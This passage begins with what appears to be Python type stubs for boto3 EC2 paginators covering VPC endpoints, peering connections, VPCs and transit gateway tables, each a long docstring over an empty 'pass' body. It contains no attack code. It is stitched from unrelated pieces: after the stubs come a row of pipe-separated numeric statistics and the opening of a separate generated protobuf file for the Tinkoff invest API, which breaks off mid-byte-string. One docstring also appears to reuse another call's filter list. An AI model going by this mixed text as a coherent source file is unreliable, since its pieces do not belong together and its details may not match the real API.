                Indicates whether the VPC endpoint is being managed by its service.
              - **NetworkInterfaceIds** *(list) --*
                (Interface endpoint) One or more network interfaces for the endpoint.
                - *(string) --*
              - **DnsEntries** *(list) --*
                (Interface endpoint) The DNS entries for the endpoint.
                - *(dict) --*
                  Describes a DNS entry.
                  - **DnsName** *(string) --*
                    The DNS name.
                  - **HostedZoneId** *(string) --*
                    The ID of the private hosted zone.
              - **CreationTimestamp** *(datetime) --*
                The date and time the VPC endpoint was created.
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type VpcEndpointIds: list
        :param VpcEndpointIds:
          One or more endpoint IDs.
          - *(string) --*
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``service-name`` : The name of the service.
          * ``vpc-id`` : The ID of the VPC in which the endpoint resides.
          * ``vpc-endpoint-id`` : The ID of the endpoint.
          * ``vpc-endpoint-state`` : The state of the endpoint. (``pending`` | ``available`` | ``deleting`` | ``deleted`` )
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass  # documentation stub — presumably the real paginator is supplied by botocore at runtime; TODO confirm
class DescribeVpcPeeringConnections(Paginator):
    def paginate(self, Filters: List = None, DryRun: bool = None, VpcPeeringConnectionIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_peering_connections`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcPeeringConnections>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              VpcPeeringConnectionIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'VpcPeeringConnections': [
                    {
                        'AccepterVpcInfo': {
                            'CidrBlock': 'string',
                            'Ipv6CidrBlockSet': [
                                {
                                    'Ipv6CidrBlock': 'string'
                                },
                            ],
                            'CidrBlockSet': [
                                {
                                    'CidrBlock': 'string'
                                },
                            ],
                            'OwnerId': 'string',
                            'PeeringOptions': {
                                'AllowDnsResolutionFromRemoteVpc': True|False,
                                'AllowEgressFromLocalClassicLinkToRemoteVpc': True|False,
                                'AllowEgressFromLocalVpcToRemoteClassicLink': True|False
                            },
                            'VpcId': 'string',
                            'Region': 'string'
                        },
                        'ExpirationTime': datetime(2015, 1, 1),
                        'RequesterVpcInfo': {
                            'CidrBlock': 'string',
                            'Ipv6CidrBlockSet': [
                                {
                                    'Ipv6CidrBlock': 'string'
                                },
                            ],
                            'CidrBlockSet': [
                                {
                                    'CidrBlock': 'string'
                                },
                            ],
                            'OwnerId': 'string',
                            'PeeringOptions': {
                                'AllowDnsResolutionFromRemoteVpc': True|False,
                                'AllowEgressFromLocalClassicLinkToRemoteVpc': True|False,
                                'AllowEgressFromLocalVpcToRemoteClassicLink': True|False
                            },
                            'VpcId': 'string',
                            'Region': 'string'
                        },
                        'Status': {
                            'Code': 'initiating-request'|'pending-acceptance'|'active'|'deleted'|'rejected'|'failed'|'expired'|'provisioning'|'deleting',
                            'Message': 'string'
                        },
                        'Tags': [
                            {
                                'Key': 'string',
                                'Value': 'string'
                            },
                        ],
                        'VpcPeeringConnectionId': 'string'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **VpcPeeringConnections** *(list) --*
            Information about the VPC peering connections.
            - *(dict) --*
              Describes a VPC peering connection.
              - **AccepterVpcInfo** *(dict) --*
                Information about the accepter VPC. CIDR block information is only returned when describing an active VPC peering connection.
                - **CidrBlock** *(string) --*
                  The IPv4 CIDR block for the VPC.
                - **Ipv6CidrBlockSet** *(list) --*
                  The IPv6 CIDR block for the VPC.
                  - *(dict) --*
                    Describes an IPv6 CIDR block.
                    - **Ipv6CidrBlock** *(string) --*
                      The IPv6 CIDR block.
                - **CidrBlockSet** *(list) --*
                  Information about the IPv4 CIDR blocks for the VPC.
                  - *(dict) --*
                    Describes an IPv4 CIDR block.
                    - **CidrBlock** *(string) --*
                      The IPv4 CIDR block.
                - **OwnerId** *(string) --*
                  The AWS account ID of the VPC owner.
                - **PeeringOptions** *(dict) --*
                  Information about the VPC peering connection options for the accepter or requester VPC.
                  - **AllowDnsResolutionFromRemoteVpc** *(boolean) --*
                    Indicates whether a local VPC can resolve public DNS hostnames to private IP addresses when queried from instances in a peer VPC.
                  - **AllowEgressFromLocalClassicLinkToRemoteVpc** *(boolean) --*
                    Indicates whether a local ClassicLink connection can communicate with the peer VPC over the VPC peering connection.
                  - **AllowEgressFromLocalVpcToRemoteClassicLink** *(boolean) --*
                    Indicates whether a local VPC can communicate with a ClassicLink connection in the peer VPC over the VPC peering connection.
                - **VpcId** *(string) --*
                  The ID of the VPC.
                - **Region** *(string) --*
                  The region in which the VPC is located.
              - **ExpirationTime** *(datetime) --*
                The time that an unaccepted VPC peering connection will expire.
              - **RequesterVpcInfo** *(dict) --*
                Information about the requester VPC. CIDR block information is only returned when describing an active VPC peering connection.
                - **CidrBlock** *(string) --*
                  The IPv4 CIDR block for the VPC.
                - **Ipv6CidrBlockSet** *(list) --*
                  The IPv6 CIDR block for the VPC.
                  - *(dict) --*
                    Describes an IPv6 CIDR block.
                    - **Ipv6CidrBlock** *(string) --*
                      The IPv6 CIDR block.
                - **CidrBlockSet** *(list) --*
                  Information about the IPv4 CIDR blocks for the VPC.
                  - *(dict) --*
                    Describes an IPv4 CIDR block.
                    - **CidrBlock** *(string) --*
                      The IPv4 CIDR block.
                - **OwnerId** *(string) --*
                  The AWS account ID of the VPC owner.
                - **PeeringOptions** *(dict) --*
                  Information about the VPC peering connection options for the accepter or requester VPC.
                  - **AllowDnsResolutionFromRemoteVpc** *(boolean) --*
                    Indicates whether a local VPC can resolve public DNS hostnames to private IP addresses when queried from instances in a peer VPC.
                  - **AllowEgressFromLocalClassicLinkToRemoteVpc** *(boolean) --*
                    Indicates whether a local ClassicLink connection can communicate with the peer VPC over the VPC peering connection.
                  - **AllowEgressFromLocalVpcToRemoteClassicLink** *(boolean) --*
                    Indicates whether a local VPC can communicate with a ClassicLink connection in the peer VPC over the VPC peering connection.
                - **VpcId** *(string) --*
                  The ID of the VPC.
                - **Region** *(string) --*
                  The region in which the VPC is located.
              - **Status** *(dict) --*
                The status of the VPC peering connection.
                - **Code** *(string) --*
                  The status of the VPC peering connection.
                - **Message** *(string) --*
                  A message that provides more information about the status, if applicable.
              - **Tags** *(list) --*
                Any tags assigned to the resource.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
              - **VpcPeeringConnectionId** *(string) --*
                The ID of the VPC peering connection.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``accepter-vpc-info.cidr-block`` - The IPv4 CIDR block of the accepter VPC.
          * ``accepter-vpc-info.owner-id`` - The AWS account ID of the owner of the accepter VPC.
          * ``accepter-vpc-info.vpc-id`` - The ID of the accepter VPC.
          * ``expiration-time`` - The expiration date and time for the VPC peering connection.
          * ``requester-vpc-info.cidr-block`` - The IPv4 CIDR block of the requester's VPC.
          * ``requester-vpc-info.owner-id`` - The AWS account ID of the owner of the requester VPC.
          * ``requester-vpc-info.vpc-id`` - The ID of the requester VPC.
          * ``status-code`` - The status of the VPC peering connection (``pending-acceptance`` | ``failed`` | ``expired`` | ``provisioning`` | ``active`` | ``deleting`` | ``deleted`` | ``rejected`` ).
          * ``status-message`` - A message that provides more information about the status of the VPC peering connection, if applicable.
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          * ``vpc-peering-connection-id`` - The ID of the VPC peering connection.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type VpcPeeringConnectionIds: list
        :param VpcPeeringConnectionIds:
          One or more VPC peering connection IDs.
          Default: Describes all your VPC peering connections.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass  # documentation stub — presumably the real paginator is supplied by botocore at runtime; TODO confirm
class DescribeVpcs(Paginator):
    def paginate(self, Filters: List = None, VpcIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpcs`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcs>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              VpcIds=[
                  'string',
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'Vpcs': [
                    {
                        'CidrBlock': 'string',
                        'DhcpOptionsId': 'string',
                        'State': 'pending'|'available',
                        'VpcId': 'string',
                        'OwnerId': 'string',
                        'InstanceTenancy': 'default'|'dedicated'|'host',
                        'Ipv6CidrBlockAssociationSet': [
                            {
                                'AssociationId': 'string',
                                'Ipv6CidrBlock': 'string',
                                'Ipv6CidrBlockState': {
                                    'State': 'associating'|'associated'|'disassociating'|'disassociated'|'failing'|'failed',
                                    'StatusMessage': 'string'
                                }
                            },
                        ],
                        'CidrBlockAssociationSet': [
                            {
                                'AssociationId': 'string',
                                'CidrBlock': 'string',
                                'CidrBlockState': {
                                    'State': 'associating'|'associated'|'disassociating'|'disassociated'|'failing'|'failed',
                                    'StatusMessage': 'string'
                                }
                            },
                        ],
                        'IsDefault': True|False,
                        'Tags': [
                            {
                                'Key': 'string',
                                'Value': 'string'
                            },
                        ]
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **Vpcs** *(list) --*
            Information about one or more VPCs.
            - *(dict) --*
              Describes a VPC.
              - **CidrBlock** *(string) --*
                The primary IPv4 CIDR block for the VPC.
              - **DhcpOptionsId** *(string) --*
                The ID of the set of DHCP options you've associated with the VPC (or ``default`` if the default options are associated with the VPC).
              - **State** *(string) --*
                The current state of the VPC.
              - **VpcId** *(string) --*
                The ID of the VPC.
              - **OwnerId** *(string) --*
                The ID of the AWS account that owns the VPC.
              - **InstanceTenancy** *(string) --*
                The allowed tenancy of instances launched into the VPC.
              - **Ipv6CidrBlockAssociationSet** *(list) --*
                Information about the IPv6 CIDR blocks associated with the VPC.
                - *(dict) --*
                  Describes an IPv6 CIDR block associated with a VPC.
                  - **AssociationId** *(string) --*
                    The association ID for the IPv6 CIDR block.
                  - **Ipv6CidrBlock** *(string) --*
                    The IPv6 CIDR block.
                  - **Ipv6CidrBlockState** *(dict) --*
                    Information about the state of the CIDR block.
                    - **State** *(string) --*
                      The state of the CIDR block.
                    - **StatusMessage** *(string) --*
                      A message about the status of the CIDR block, if applicable.
              - **CidrBlockAssociationSet** *(list) --*
                Information about the IPv4 CIDR blocks associated with the VPC.
                - *(dict) --*
                  Describes an IPv4 CIDR block associated with a VPC.
                  - **AssociationId** *(string) --*
                    The association ID for the IPv4 CIDR block.
                  - **CidrBlock** *(string) --*
                    The IPv4 CIDR block.
                  - **CidrBlockState** *(dict) --*
                    Information about the state of the CIDR block.
                    - **State** *(string) --*
                      The state of the CIDR block.
                    - **StatusMessage** *(string) --*
                      A message about the status of the CIDR block, if applicable.
              - **IsDefault** *(boolean) --*
                Indicates whether the VPC is the default VPC.
              - **Tags** *(list) --*
                Any tags assigned to the VPC.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``cidr`` - The primary IPv4 CIDR block of the VPC. The CIDR block you specify must exactly match the VPC's CIDR block for information to be returned for the VPC. Must contain the slash followed by one or two digits (for example, ``/28`` ).
          * ``cidr-block-association.cidr-block`` - An IPv4 CIDR block associated with the VPC.
          * ``cidr-block-association.association-id`` - The association ID for an IPv4 CIDR block associated with the VPC.
          * ``cidr-block-association.state`` - The state of an IPv4 CIDR block associated with the VPC.
          * ``dhcp-options-id`` - The ID of a set of DHCP options.
          * ``ipv6-cidr-block-association.ipv6-cidr-block`` - An IPv6 CIDR block associated with the VPC.
          * ``ipv6-cidr-block-association.association-id`` - The association ID for an IPv6 CIDR block associated with the VPC.
          * ``ipv6-cidr-block-association.state`` - The state of an IPv6 CIDR block associated with the VPC.
          * ``isDefault`` - Indicates whether the VPC is the default VPC.
          * ``owner-id`` - The ID of the AWS account that owns the VPC.
          * ``state`` - The state of the VPC (``pending`` | ``available`` ).
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          * ``vpc-id`` - The ID of the VPC.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type VpcIds: list
        :param VpcIds:
          One or more VPC IDs.
          Default: Describes all your VPCs.
          - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass  # documentation stub — presumably the real paginator is supplied by botocore at runtime; TODO confirm
class GetTransitGatewayAttachmentPropagations(Paginator):
    def paginate(self, TransitGatewayAttachmentId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.get_transit_gateway_attachment_propagations`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/GetTransitGatewayAttachmentPropagations>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              TransitGatewayAttachmentId='string',
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'TransitGatewayAttachmentPropagations': [
                    {
                        'TransitGatewayRouteTableId': 'string',
                        'State': 'enabling'|'enabled'|'disabling'|'disabled'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **TransitGatewayAttachmentPropagations** *(list) --*
            Information about the propagation route tables.
            - *(dict) --*
              Describes a propagation route table.
              - **TransitGatewayRouteTableId** *(string) --*
                The ID of the propagation route table.
              - **State** *(string) --*
                The state of the propagation route table.
        :type TransitGatewayAttachmentId: string
        :param TransitGatewayAttachmentId: **[REQUIRED]**
          The ID of the attachment.
        :type Filters: list
        :param Filters:
          One or more filters. The possible values are:
          * ``transit-gateway-route-table-id`` - The ID of the transit gateway route table.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass  # documentation stub — presumably the real paginator is supplied by botocore at runtime; TODO confirm
class GetTransitGatewayRouteTableAssociations(Paginator):
    def paginate(self, TransitGatewayRouteTableId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.get_transit_gateway_route_table_associations`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/GetTransitGatewayRouteTableAssociations>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              TransitGatewayRouteTableId='string',
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'Associations': [
                    {
                        'TransitGatewayAttachmentId': 'string',
                        'ResourceId': 'string',
                        'ResourceType': 'vpc'|'vpn',
                        'State': 'associating'|'associated'|'disassociating'|'disassociated'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **Associations** *(list) --*
            Information about the associations.
            - *(dict) --*
              Describes an association between a route table and a resource attachment.
              - **TransitGatewayAttachmentId** *(string) --*
                The ID of the attachment.
              - **ResourceId** *(string) --*
                The ID of the resource.
              - **ResourceType** *(string) --*
                The resource type.
              - **State** *(string) --*
                The state of the association.
        :type TransitGatewayRouteTableId: string
        :param TransitGatewayRouteTableId: **[REQUIRED]**
          The ID of the transit gateway route table.
        :type Filters: list
        :param Filters:
          One or more filters. The possible values are:
          * ``resource-id`` - The ID of the resource.
          * ``resource-type`` - The resource type (``vpc`` | ``vpn`` ).
          * ``transit-gateway-attachment-id`` - The ID of the attachment.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass  # documentation stub — presumably the real paginator is supplied by botocore at runtime; TODO confirm
class GetTransitGatewayRouteTablePropagations(Paginator):
    def paginate(self, TransitGatewayRouteTableId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates responses from
        :py:meth:`EC2.Client.get_transit_gateway_route_table_propagations`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/GetTransitGatewayRouteTablePropagations>`_

        :type TransitGatewayRouteTableId: string
        :param TransitGatewayRouteTableId: **[REQUIRED]**
            The ID of the transit gateway route table.
        :type Filters: list
        :param Filters:
            One or more filters. Each filter is a dict with a case-sensitive
            ``Name`` (string) and ``Values`` (list of strings). Supported
            filter names:
            * ``resource-id`` - The ID of the resource.
            * ``resource-type`` - The resource type (``vpc`` | ``vpn``).
            * ``transit-gateway-attachment-id`` - The ID of the attachment.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request, and provides an error
            response. With the required permissions the error response is
            ``DryRunOperation``; otherwise it is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination:
            ``MaxItems`` (integer) - total number of items to return before a
            ``NextToken`` is emitted; ``PageSize`` (integer) - size of each
            page; ``StartingToken`` (string) - the ``NextToken`` from a
            previous response, used to resume pagination.
        :rtype: dict
        :returns:
            Pages of the form
            ``{'TransitGatewayRouteTablePropagations': [{...}]}`` where each
            entry carries ``TransitGatewayAttachmentId`` (string),
            ``ResourceId`` (string), ``ResourceType`` (``'vpc'|'vpn'``) and
            ``State`` (``'enabling'|'enabled'|'disabling'|'disabled'``).
        """
        pass
| 60.979361
| 2,679
| 0.517366
| 60,721
| 652,967
| 5.556562
| 0.03358
| 0.014197
| 0.007303
| 0.009544
| 0.800267
| 0.767321
| 0.737988
| 0.708142
| 0.682946
| 0.657273
| 0
| 0.020046
| 0.37682
| 652,967
| 10,707
| 2,680
| 60.985057
| 0.809118
| 0.851911
| 0
| 0.387755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326531
| false
| 0.326531
| 0.040816
| 0
| 0.693878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
b4c8fe794117bc0e776b4851544c3df435f9bf27
| 124,516
|
py
|
Python
|
tinkoff/invest/grpc/operations_pb2.py
|
forked-group/invest-python
|
3398391f5bb4a52020c312855de175cfe8cdc021
|
[
"Apache-2.0"
] | null | null | null |
tinkoff/invest/grpc/operations_pb2.py
|
forked-group/invest-python
|
3398391f5bb4a52020c312855de175cfe8cdc021
|
[
"Apache-2.0"
] | null | null | null |
tinkoff/invest/grpc/operations_pb2.py
|
forked-group/invest-python
|
3398391f5bb4a52020c312855de175cfe8cdc021
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tinkoff/invest/grpc/operations.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database: every descriptor built below is registered here so
# the generated message/enum types can be looked up by full name at runtime.
_sym_db = _symbol_database.Default()
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
from tinkoff.invest.grpc import common_pb2 as tinkoff_dot_invest_dot_grpc_dot_common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='tinkoff/invest/grpc/operations.proto',
package='tinkoff.public.invest.api.contract.v1',
syntax='proto3',
serialized_options=b'\n\034ru.tinkoff.piapi.contract.v1P\001Z\014./;investapi\242\002\005TIAPI\252\002\024Tinkoff.InvestApi.V1\312\002\021Tinkoff\\Invest\\V1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n$tinkoff/invest/grpc/operations.proto\x12%tinkoff.public.invest.api.contract.v1\x1a\x1fgoogle/protobuf/timestamp.proto\x1a tinkoff/invest/grpc/common.proto\"\xcd\x01\n\x11OperationsRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\x12(\n\x04\x66rom\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12&\n\x02to\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x44\n\x05state\x18\x04 \x01(\x0e\x32\x35.tinkoff.public.invest.api.contract.v1.OperationState\x12\x0c\n\x04\x66igi\x18\x05 \x01(\t\"Z\n\x12OperationsResponse\x12\x44\n\noperations\x18\x01 \x03(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Operation\"\xaf\x04\n\tOperation\x12\n\n\x02id\x18\x01 \x01(\t\x12\x1b\n\x13parent_operation_id\x18\x02 \x01(\t\x12\x10\n\x08\x63urrency\x18\x03 \x01(\t\x12\x42\n\x07payment\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12@\n\x05price\x18\x05 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x44\n\x05state\x18\x06 \x01(\x0e\x32\x35.tinkoff.public.invest.api.contract.v1.OperationState\x12\x10\n\x08quantity\x18\x07 \x01(\x03\x12\x15\n\rquantity_rest\x18\x08 \x01(\x03\x12\x0c\n\x04\x66igi\x18\t \x01(\t\x12\x17\n\x0finstrument_type\x18\n \x01(\t\x12(\n\x04\x64\x61te\x18\x0b \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x0c\n\x04type\x18\x0c \x01(\t\x12L\n\x0eoperation_type\x18\r \x01(\x0e\x32\x34.tinkoff.public.invest.api.contract.v1.OperationType\x12\x45\n\x06trades\x18\x0e \x03(\x0b\x32\x35.tinkoff.public.invest.api.contract.v1.OperationTrade\"\xa5\x01\n\x0eOperationTrade\x12\x10\n\x08trade_id\x18\x01 \x01(\t\x12-\n\tdate_time\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x10\n\x08quantity\x18\x03 \x01(\x03\x12@\n\x05price\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\"&\n\x10PortfolioRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\"\xbb\x04\n\x11PortfolioResponse\x12N\n\x13total_amount_shares\x18\x01 
